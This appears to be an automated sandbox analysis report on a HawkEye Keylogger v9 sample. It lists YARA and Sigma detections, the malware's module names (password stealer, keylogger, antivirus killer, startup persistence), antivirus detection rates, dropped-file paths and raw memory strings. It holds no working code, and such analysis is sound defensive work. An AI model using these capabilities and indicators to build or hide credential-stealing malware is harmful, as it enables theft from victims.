0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack	HawkEyev9	HawkEye v9 Payload	ditekshen	0x87c2e:$id1: HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \ {2} 0x87c97:$id2: HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \ {3}{0}{0}{4} 0x8103e:$str1: _PasswordStealer 0x8104f:$str2: _KeyStrokeLogger 0x81071:$str3: _ScreenshotLogger 0x81060:$str4: _ClipboardLogger 0x81083:$str5: _WebCamLogger 0x81198:$str6: _AntiVirusKiller 0x81186:$str7: _ProcessElevation 0x8114d:$str8: _DisableCommandPrompt 0x81253:$str9: _WebsiteBlocker 0x81263:$str9: _WebsiteBlocker 0x81139:$str10: _DisableTaskManager 0x811b4:$str11: _AntiDebugger 0x8123e:$str12: _WebsiteVisitorSites 0x81163:$str13: _DisableRegEdit 0x811c2:$str14: _ExecutionDelay 0x810e7:$str15: _InstallStartupPersistance
6.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 37 entries

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe, ProcessId: 6432, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xjyxibeifbdmock.eu.url

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: b15023b1855da1cf5213b061dc626cc2.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Show sources

Source: vbc.exe.6576.2.memstr

Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}

Multi AV Scanner detection for domain / URL

Show sources

Source: http://pomf.cat/upload.php

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe

ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Show sources

Source: b15023b1855da1cf5213b061dc626cc2.exe	Virustotal: Detection: 60%	Perma Link
Source: b15023b1855da1cf5213b061dc626cc2.exe	Metadefender: Detection: 48%	Perma Link
Source: b15023b1855da1cf5213b061dc626cc2.exe	ReversingLabs: Detection: 64%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: b15023b1855da1cf5213b061dc626cc2.exe

Joe Sandbox ML: detected

Source: 4.2.xjyxibeifbdmock.exe.150000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 1.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.a30000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.0.xjyxibeifbdmock.exe.150000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 5.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 0.0.b15023b1855da1cf5213b061dc626cc2.exe.a30000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe	Code function: 0_2_00A3781C FindFirstFileExA,	0_2_00A3781C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,	2_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 2_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,	2_2_00408CAC
Source: C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe	Code function: 4_2_0015781C FindFirstFileExA,	4_2_0015781C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,	6_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,	6_2_00408CAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 13_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_0040702D

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Source: vbc.exe, 00000002.00000002.370849978.0000000002214000.00000004.00000001.sdmp	String found in binary or memory: 38632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: vbc.exe, 00000002.00000002.370849978.0000000002214000.00000004.00000001.sdmp	String found in binary or memory: 38632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe, 00000006.00000002.405655164.00000000020E4000.00000004.00000001.sdmp	String found in binary or memory: 38632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000006.00000002.405655164.00000000020E4000.00000004.00000001.sdmp	String found in binary or memory: 38632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: RegAsm.exe, 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, vbc.exe, 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, RegAsm.exe, 00000005.00000002.606139905.0000000002DD2000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: RegAsm.exe, 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, vbc.exe, 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, RegAsm.exe, 00000005.00000002.606139905.0000000002DD2000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000002.00000003.368921310.0000000002212000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.c
Source: vbc.exe, 00000002.00000003.368921310.0000000002212000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.c
Source: vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.c
Source: vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.c
Source: vbc.exe, 00000006.00000003.404653728.00000000020E2000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.c
